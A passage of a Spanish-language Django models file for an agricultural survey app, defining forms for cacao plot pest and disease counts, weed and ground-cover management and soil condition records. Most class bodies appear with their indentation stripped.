fuentes = MultiSelectField(choices=CHOICE_ORIENTACION,
verbose_name='3. Las fuentes de orientación para manejo de las plagas y enfermedades')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"Orientacion"
CHOICE_OBSERVACION_PUNTO1 = (
(1, 'Monilia'),
(2, 'Mazorca Negra'),
(3, 'Mal de machete'),
(4, 'Daño de ardilla'),
(5, 'Daño de barrenador'),
(6, 'Chupadores'),
(7, 'Daño de zompopo'),
(8, 'Bejuco'),
(9, 'Tanda'),
(10, 'Daño de comején'),
(11, 'Daño de minador de la hoja'),
(12, 'Daño por lana'),
(13, 'Otros'),
)
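# Note: each ObservacionPuntoN model below records a Si/No mark for ten plants
# at one observation point; save() derives `contador`, the number of affected
# plants. The matching ObservacionPuntoNNivel models count plants per
# production level (alta/media/baja) instead.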
class ObservacionPunto1(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True, verbose_name='Diez')
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count how many of the ten sampled plants show the pest (1 = 'Si')
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.contador = sum(1 for campo in campos if campo == 1)
        super(ObservacionPunto1, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto1"
class ObservacionPunto1Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count plants per production level: 1 = alta, 2 = media, 3 = baja
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.alta = sum(1 for campo in campos if campo == 1)
        self.media = sum(1 for campo in campos if campo == 2)
        self.baja = sum(1 for campo in campos if campo == 3)
        super(ObservacionPunto1Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto1 nivel produccion"
class ObservacionPunto2(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count how many of the ten sampled plants show the pest (1 = 'Si')
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.contador = sum(1 for campo in campos if campo == 1)
        super(ObservacionPunto2, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto2"
class ObservacionPunto2Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count plants per production level: 1 = alta, 2 = media, 3 = baja
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.alta = sum(1 for campo in campos if campo == 1)
        self.media = sum(1 for campo in campos if campo == 2)
        self.baja = sum(1 for campo in campos if campo == 3)
        super(ObservacionPunto2Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto2 nivel produccion"
class ObservacionPunto3(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count how many of the ten sampled plants show the pest (1 = 'Si')
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.contador = sum(1 for campo in campos if campo == 1)
        super(ObservacionPunto3, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto3"
class ObservacionPunto3Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
    def save(self, *args, **kwargs):
        # Count plants per production level: 1 = alta, 2 = media, 3 = baja
        campos = [self.uno, self.dos, self.tres, self.cuatro, self.cinco,
                  self.seis, self.siete, self.ocho, self.nueve, self.dies]
        self.alta = sum(1 for campo in campos if campo == 1)
        self.media = sum(1 for campo in campos if campo == 2)
        self.baja = sum(1 for campo in campos if campo == 3)
        super(ObservacionPunto3Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto3 nivel produccion"
CHOICE_ENFERMEDADES = (
("A", 'Monilia'),
("B", 'Mazorca negra'),
("C", 'Mal de machete'),
("D", 'Mal de talluelo en el vivero'),
("E", 'Barrenadores de tallo'),
("F", 'Zompopos'),
("G", 'Chupadores o áfidos'),
("H", 'Escarabajos'),
("J", 'Comején'),
("K", 'Minador de la hoja'),
("L", 'Lana'),
("M", 'Ardillaa'),
("N", 'Bejuco'),
("O", 'Tanda'),
)
CHOICE_SITUACION_PLAGAS = (
(1, 'Varias plagas en todos los puntos'),
(2, 'Varias plagas en algunos puntos'),
(3, 'Pocas plagas en todos los puntos'),
(4, 'Pocas plagas en algunos puntos'),
(5, 'Una plaga en todos los puntos'),
(6, 'Una plaga en algunos puntos'),
)
class ProblemasPrincipales(models.Model):
observadas = MultiSelectField(choices=CHOICE_ENFERMEDADES,
verbose_name='Las plagas y enfermedades observadas en la parcela')
situacion = models.IntegerField(choices=CHOICE_SITUACION_PLAGAS,blank=True, null=True)
principales = MultiSelectField(choices=CHOICE_ENFERMEDADES,
verbose_name='Las plagas y enfermedades principales en la parcela')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"problemas principales"
CHOICE_ENFERMEDADES_PUNTO6_1 = (
("A", 'Suelo erosionado'),
("B", 'Suelo poco fértil'),
("C", 'Mucha competencia'),
("D", 'Mal drenaje'),
("E", 'Falta obras de conservación'),
("F", 'Suelo compacto'),
("G", 'Suelo con poca MO'),
("H", 'No usa abono o fertilizante'),
)
CHOICE_ENFERMEDADES_PUNTO6_2 = (
(1, 'Sombra muy densa'),
(2, 'Sombra muy rala'),
(3, 'Sombra mal distribuida'),
(4, 'Arboles de sombra no adecuada'),
(5, 'Mucha auto-sombra'),
(6, 'Mucho banano'),
)
CHOICE_ENFERMEDADES_PUNTO6_3 = (
("A", 'Poda no adecuada'),
("B", 'Piso no manejado'),
("C", 'No eliminan mazorcas enfermas'),
("D", 'No hay manejo de plagas'),
("E", 'Plantas desnutridas'),
("F", 'Plantación vieja'),
("G", 'Variedades susceptibles'),
("H", 'Variedades no productivas'),
)
class Punto6Plagas(models.Model):
observaciones = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO6_1,
verbose_name='Observaciones de suelo ')
sombra = models.IntegerField(choices=CHOICE_ENFERMEDADES_PUNTO6_2,
verbose_name="Observaciones de sombra", blank=True, null=True)
manejo = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO6_3,
verbose_name='Observaciones de manejo ')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 6"
CHOICE_ACCIONES_PUNTO7_1 = (
(1, 'Recuento de plagas'),
(2, 'Cortar las mazorcas enfermas'),
(3, 'Abonar las plantas'),
(4, 'Aplicar Caldos'),
(5, 'Aplicar Fungicidas'),
(6, 'Manejo de sombra'),
(7, 'Podar las plantas de cacao'),
(8, 'Aplicar venenos para Zompopo'),
(9, 'Control de Comején'),
)
CHOICE_ACCIONES_PUNTO7_2 = (
(1, 'Toda la parcela'),
(2, 'Alguna parte de la parcela'),
)
class Punto7Plagas(models.Model):
manejo = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_1,
verbose_name="Manejo de plagas y enfermedades", blank=True, null=True)
parte = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_2,
verbose_name="En que parte", blank=True, null=True)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses vamos a realizar el manejo')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 7"
CHOICE_ENFERMEDADES_PUNTO8 = (
("A", 'Medial Luna'),
("B", 'Tijera'),
("C", 'Serrucho'),
("D", 'Bomba de mochila'),
("E", 'Barril'),
("F", 'Cutacha'),
("G", 'No tiene'),
("H", 'Coba'),
)
class Punto8y9Plagas(models.Model):
equipos = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO8,
verbose_name='8.¿Tenemos los equipos necesarios para realizar manejo de plagas y enfermedades?')
opcion = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="9.¿Tenemos la formación para realizar el manejo de plagas y enfermedades?",
blank=True, null=True)
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 8 y 9"
#------------------------------ fin de ficha de plagas -------------------------------
class FichaPiso(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_piso')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_piso')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha piso"
verbose_name_plural = "Fichas piso"
CHOICE_PISO1 = (
("A", 'Zacates o matas de hoja angosta'),
("B", 'Arbustos o plantas de hoja ancha'),
("C", 'Coyol o Coyolillo'),
("D", 'Bejucos'),
("E", 'Tanda'),
("F", 'Cobertura de hoja ancha'),
("G", 'Cobertura de hoja angosta'),
)
class PisoPunto1(models.Model):
punto1 = MultiSelectField(choices=CHOICE_PISO1,
        verbose_name='1.¿Cuáles son las hierbas que cubren el piso y suben sobre las plantas de cacao? ')
punto2 = MultiSelectField(choices=CHOICE_PISO1,
        verbose_name='2.¿Cuáles son las hierbas que usted considera dañinas? ')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"piso 1 y 2"
CHOICE_PISO3 = (
(1, 'Recuento de malezas'),
(2, 'Chapoda tendida'),
(3, 'Chapoda selectiva'),
(4, 'Aplicar herbicidas total'),
(5, 'Aplicar herbicidas en parches'),
(6, 'Manejo de bejuco'),
(7, 'Manejo de tanda'),
(8, 'Regulación de sombra'),
)
class PisoPunto3(models.Model):
manejo = models.IntegerField(choices=CHOICE_PISO3,
verbose_name="Manejo de piso",
blank=True, null=True)
realiza = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="Realiza en manejo",
blank=True, null=True)
    veces = models.FloatField("Cuántas veces realizan el manejo")
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
        verbose_name='En qué meses vamos a realizar el manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 3"
CHOICE_PISO4 = (
("A", 'Técnico'),
("B", 'Casa comercial'),
("C", 'Cooperativa'),
("D", 'Otros productores'),
("E", 'Experiencia propia/costumbres'),
("F", 'Otros medio de comunicación'),
)
class PisoPunto4(models.Model):
manejo = MultiSelectField(choices=CHOICE_PISO4,
verbose_name='4.¿De dónde viene su orientación de manejo de malas hierbas?')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 4"
CHOICE_PISO5 = (
(1, 'Zacate anual'),
(2, 'Zacate perene'),
(3, 'Hoja ancha anual'),
(4, 'Hoja ancha perenne'),
(5, 'Ciperácea o Coyolillo'),
(6, 'Bejucos en suelo'),
(7, 'Cobertura hoja ancha'),
(8, 'Cobertura hoja angosta'),
(9, 'Hojarasca'),
(10, 'Mulch de maleza'),
(11, 'Suelo desnudo')
)
class PisoPunto5(models.Model):
estado = models.IntegerField(choices=CHOICE_PISO5,
verbose_name="Estado de Piso",
blank=True, null=True)
conteo = models.FloatField('Conteo (números)')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 5"
CHOICE_PISO6_1 = (
("A", 'Sin competencia'),
("B", 'Media competencia'),
("C", 'Alta competencia'),
)
CHOICE_PISO6_2 = (
(1, 'Piso cubierto pero compite'),
(2, 'Piso medio cubierto y compite'),
(3, 'Piso no cubierto'),
(4, 'Piso con mucho bejuco'),
(5, 'Plantas con bejuco'),
(6, 'Plantas con tanda'),
)
CHOICE_PISO6_3 = (
("A", 'Zacate anual'),
("B", 'Zacate perene'),
("C", 'Hoja ancha anual'),
("D", 'Hoja ancha perenne'),
("E", 'Ciperácea o Coyolillo'),
("F", 'Bejucos'),
)
class PisoPunto6(models.Model):
manejo = MultiSelectField(choices=CHOICE_PISO6_1,
verbose_name='La competencia entre malas hierbas y las plantas de cacao?')
estado = models.IntegerField(choices=CHOICE_PISO6_2,
verbose_name="La cobertura del piso de cacaotal",
blank=True, null=True)
maleza = MultiSelectField(choices=CHOICE_PISO6_3,
verbose_name='Tipo de malezas que compiten')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 6"
CHOICE_PISO7_1 = (
("A", 'Suelo erosionado'),
("B", 'Suelo poco fértil'),
("C", 'Mal drenaje'),
("D", 'Suelo compacto'),
("E", 'Suelo con poca MO'),
("F", 'No usa abono o fertilizante'),
)
CHOICE_PISO7_2 = (
("A", 'Sombra muy rala'),
("B", 'Sombra mal distribuida'),
("C", 'Arboles de sombra no adecuada'),
("D", 'Poco banano'),
)
CHOICE_PISO7_3 = (
("A", 'Chapoda no adecuada'),
("B", 'Chapoda tardía'),
("C", 'No hay manejo selectivo'),
("D", 'Plantas desnutridas'),
("E", 'Plantación vieja'),
("F", 'Mala selección de herbicidas'),
)
class PisoPunto7(models.Model):
suelo = MultiSelectField(choices=CHOICE_PISO7_1,
verbose_name='Observaciones de suelo ')
sombra = MultiSelectField(choices=CHOICE_PISO7_2,
verbose_name='Observaciones de sombra')
manejo = MultiSelectField(choices=CHOICE_PISO7_3,
verbose_name='Observaciones de manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 7"
CHOICE_PISO8 = (
(1, 'Recuento de malezas'),
(2, 'Chapoda tendida'),
(3, 'Chapoda selectiva'),
(4, 'Aplicar herbicidas total'),
(5, 'Aplicar herbicidas en parches'),
(6, 'Manejo de bejuco'),
(7, 'Manejo de tanda'),
(8, 'Regulación de sombra'),
)
class PisoPunto8(models.Model):
piso = models.IntegerField(choices=CHOICE_PISO8,
verbose_name="Manejo de piso",
blank=True, null=True)
parte = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_2,
verbose_name="En que parte",
blank=True, null=True)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses vamos a realizar el manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 8"
CHOICE_PISO10 = (
("A", 'Machete'),
("B", 'Pico'),
("C", 'Pala'),
("D", 'Bomba de mochila'),
("E", 'Barril'),
("F", 'Cutacha'),
("G", 'No tiene'),
("H", 'Coba'),
)
class PisoPunto10(models.Model):
equipo = MultiSelectField(choices=CHOICE_PISO10,
verbose_name='10.¿Tenemos los equipos necesarios para realizar manejo de piso?')
formacion = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="11.¿Tenemos la formación para realizar el manejo de piso?",
blank=True, null=True)
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 10 y 11"
#-------------------------- entradas de suelo ----------------------------------
class FichaSuelo(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_suelo')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_suelo')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha suelo"
verbose_name_plural = "Ficha suelo"
CHOICE_SUELO_USO_PARCELA = (
(1, 'Bosque'),
(2, 'Potrero'),
(3, 'Granos básicos'),
(4, 'Tacotal'),
(5, 'Cacaotal viejo'),
)
CHOICE_SUELO_LIMITANTES = (
('A', 'Acidez / pH del suelo '),
('B', 'Encharcamiento / Mal Drenaje'),
('C', 'Enfermedades de raíces '),
('D', 'Deficiencia de nutrientes'),
('E', 'Baja materia orgánica'),
('F', 'Baja actividad biológica y presencia de lombrices'),
('G', 'Erosión'),
('H', 'Compactación e infiltración de agua'),
)
CHOICE_SUELO_ORIENTACION = (
('A', 'Técnico'),
('B', 'Casa comercial'),
('C', 'Cooperativa'),
('D', 'Otros productores'),
('E', 'Experiencia propia/costumbres'),
('F', 'Otros medio de comunicación'),
('G', 'Análisis de suelo '),
('H', 'Otros '),
)
CHOICE_SUELO_ABONOS = (
('A', 'Hecho en finca (compost, estiércol)'),
('B', 'Regalados de otra finca (compost, estiércol)'),
('C', 'Comprados de otra finca (compost, estiércol)'),
('D', 'Comprado de casa comercial'),
('E', 'Con crédito de la cooperativa'),
('F', 'Incentivos/Regalados'),
('G', 'No aplica'),
)
class Punto1Suelo(models.Model):
uso_parcela = models.IntegerField(choices=CHOICE_SUELO_USO_PARCELA,
verbose_name="Cuál era el uso de la parcela antes de establecer el cacao?")
limitante = MultiSelectField(choices=CHOICE_SUELO_LIMITANTES,
verbose_name='Cuáles son los limitantes productivos del suelo de la parcela?')
orientacion = MultiSelectField(choices=CHOICE_SUELO_ORIENTACION,
        verbose_name='¿De quién viene su orientación de manejo de fertilidad de suelo?')
abonos = MultiSelectField(choices=CHOICE_SUELO_ABONOS,
        verbose_name='4. ¿De dónde consigue los abonos, fertilizantes y enmiendas de suelo?')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 1"
class Meta:
verbose_name = 'Historial de manejo y limitaciones observados'
verbose_name_plural = 'Historial de manejo y limitaciones observados'
CHOICE_SUELO_EROSION_OPCION = (
(1, 'Deslizamientos'),
(2, 'Evidencia de erosión'),
(3, 'Cárcavas'),
(4, 'Área de acumulación de sedimentos'),
(5, 'Pedregosidad'),
(6, 'Raíces desnudos'),
)
CHOICE_SUELO_EROSION_RESPUESTA = (
(1, 'No presente'),
(2, 'Algo'),
(3, 'Severo'),
)
class PuntoASuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_EROSION_OPCION,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_EROSION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Indicadores de erosión"
class Meta:
verbose_name = 'Indicadores de erosión'
verbose_name_plural = 'Indicadores de erosión'
CHOICE_SUELO_CONSERVACION_OPCION = (
    (1, 'Barreras muertas'),
(2, 'Barrera Viva'),
(3, 'Siembra en Curvas a Nivel'),
(4, 'Terrazas'),
(5, 'Cobertura de piso'),
)
CHOICE_SUELO_CONSERVACION_RESPUESTA = (
(1, 'No presente'),
(2, 'En mal estado'),
(3, 'En buen estado'),
)
class PuntoBSuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_OPCION,
verbose_name="Obras")
respuesta = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Obras de conservación de suelo"
class Meta:
verbose_name = 'Obras de conservación de suelo'
verbose_name_plural = 'Obras de conservación de suelo'
CHOICE_SUELO_DRENAJE_OPCION = (
(1, 'Encharcamientos'),
(2, 'Amarillamiento/mal crecimiento'),
(3, 'Enfermedades (phytophthora)'),
)
class Punto2ASuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_DRENAJE_OPCION,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_EROSION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Indicadores de drenaje"
class Meta:
verbose_name = 'Indicadores de drenaje'
verbose_name_plural = 'Indicadores de drenaje'
CHOICE_SUELO_DRENAJE_OPCION2 = (
(1, 'Acequias'),
(2, 'Canales de drenaje a lo largo y ancho de la parcela'),
(3, 'Canales de drenaje alrededor de las plantas'),
(4, 'Canales a lado de la parcela'),
(5, 'Cobertura de piso'),
)
class Punto2BSuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_DRENAJE_OPCION2,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Obras de drenaje"
class Meta:
verbose_name = 'Obras de drenaje'
verbose_name_plural = 'Obras de drenaje'
CHOICE_SUELO_OPCION_PUNTOS = (
(1, 'Severidad de daño de nematodos'),
(2, 'Severidad de daño de hongos'),
)
CHOICE_SUELO_RESPUESTA_PUNTOS = (
(1, 'No Afectado'),
(2, 'Afectado'),
(3, 'Muy Afectados'),
(4, 'Severamente afectados'),
)
class Punto3SueloPunto1(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 1"
class Meta:
verbose_name = 'Salud de Raíces punto 1'
verbose_name_plural = 'Salud de Raíces punto 1'
class Punto3SueloPunto2(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 2"
class Meta:
verbose_name = 'Salud de Raíces punto 2'
verbose_name_plural = 'Salud de Raíces punto 2'
class Punto3SueloPunto3(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 3"
class Meta:
verbose_name = 'Salud de Raíces punto 3'
verbose_name_plural = 'Salud de Raíces punto 3'
class Punto4Suelo(models.Model):
area = models.FloatField(verbose_name='Tamaño de Área de Cacao SAF (en manzanas)')
densidad = models.FloatField(verbose_name='Densidad de Arboles de Cacao en parcela SAF (por manzana)')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Balance de nutrientes de parcela Cacao SAF"
class Meta:
verbose_name = 'Balance de nutrientes de parcela Cacao SAF'
verbose_name_plural = 'Balance de nutrientes de parcela Cacao SAF'
CHOICE_SUELO_PRODUCTO_COSECHA = (
(1, 'Cacao Grano Seco - (qq/mz/año)'),
(2, 'Leña - (cargas de 125lb /mz/año)'),
(3, 'Cabezas de Banano - (cabezas/mz/año)'),
)
class Punto4SueloCosecha(models.Model):
producto = models.IntegerField(choices=CHOICE_SUELO_PRODUCTO_COSECHA)
cantidad = models.FloatField()
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Cosechas del Productos SAF"
class Meta:
verbose_name = 'Cosechas del Productos SAF'
verbose_name_plural = 'Cosechas del Productos SAF'
class Punto4SueloSI(models.Model):
opcion = models.IntegerField(choices=CHOICE_SI_NO)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Se regresa la cascara a la parcela como abono?"
class Meta:
verbose_name = 'Se regresa la cascara a la parcela como abono?'
verbose_name_plural = 'Se regresa la cascara a la parcela como abono?'
class TipoFertilizantes(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return u'%s' % (self.nombre)
CHOICE_UNIDAD_MEDIDA_ABONO = ((1,'lb/mz'),(2,'lb/planta '),(3,'oz/planta'),(4,'L/mz'),(5, 'qq/mz'))
class Punto5SueloAbonos(models.Model):
tipo = models.ForeignKey(TipoFertilizantes)
cantidad = models.FloatField('Cantidad(Valor)')
unidad = models.IntegerField(choices=CHOICE_UNIDAD_MEDIDA_ABONO)
humedad = models.FloatField('Humedad (%)')
frecuencia = models.FloatField('Frecuencia (por año)')
meses = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='Meses de aplicación')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF"
class Meta:
verbose_name = 'Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF'
verbose_name_plural = 'Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF'
class DatosAnalisis(models.Model):
variable = models.CharField(max_length=250)
unidad = models.CharField(max_length=250)
valor_critico = models.FloatField()
def __unicode__(self):
return self.variable
class Punto6AnalisisSuelo(models.Model):
variable = models.ForeignKey(DatosAnalisis)
valor = models.FloatField()
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Datos de análisis de suelo"
class Meta:
verbose_name = 'Datos de análisis de suelo'
verbose_name_plural = 'Datos de análisis de suelo'
class Punto7TipoSuelo(models.Model):
